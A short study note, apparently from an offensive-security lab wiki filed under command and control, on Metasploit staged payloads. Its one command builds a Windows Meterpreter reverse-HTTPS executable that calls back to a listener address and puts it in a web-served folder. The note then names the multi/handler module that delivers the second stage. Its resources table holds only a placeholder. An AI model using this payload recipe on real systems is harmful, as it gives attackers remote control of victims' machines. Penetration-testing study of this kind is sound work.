Secondary Categories: 02-Command and Control
Description:
Staged Payload:
sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f exe -o /var/www/html/msfstaged.exe
In order to use staged payloads, we’ll need to use the multi/handler. This Metasploit module listens for incoming callbacks from staged payloads and delivers the second stage.
Resources:
Title | URL |
---|---|
place | holder |